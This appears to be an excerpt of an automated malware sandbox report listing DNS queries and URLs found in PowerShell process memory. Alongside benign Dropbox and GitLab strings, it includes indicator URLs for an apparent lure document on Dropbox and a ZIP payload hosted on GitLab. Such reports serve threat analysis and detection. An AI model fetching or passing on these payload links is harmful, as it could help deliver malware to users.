              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; base-uri 'self' ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
              Source: global trafficDNS traffic detected: DNS query: ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com
              Source: global trafficDNS traffic detected: DNS query: gitlab.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Nov 2024 08:56:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8200Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
              Source: powershell.exe, 0000000C.00000002.2201398911.000001F3901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2201398911.000001F390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F3819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E96A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E9562000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024405A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254D94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.00000244040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
              Source: powershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254D94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.00000244040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
              Source: powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
              Source: powershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com(
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
              Source: powershell.exe, 0000000E.00000002.2257395123.00000254D7579000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2324464767.00000254F1549000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2326723218.00000254F179D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327742762.00000254F1819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip
              Source: powershell.exe, 0000000E.00000002.2326636099.00000254F1690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zip
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/users/sign_in
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F380C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DA123000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024404CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
              Source: powershell.exe, 0000000C.00000002.2201398911.000001F3901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2201398911.000001F390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F3819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E96A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E9562000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024405A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com/cd/0/get/CelT5aTdmoNoeQaou8KCBWvfzViG
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F38162C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
              Source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?
              Source: powershell.exe, 0000000C.00000002.2211751712.000001F3F1640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?
              Source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/8wcdoh5jl9xyp5
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
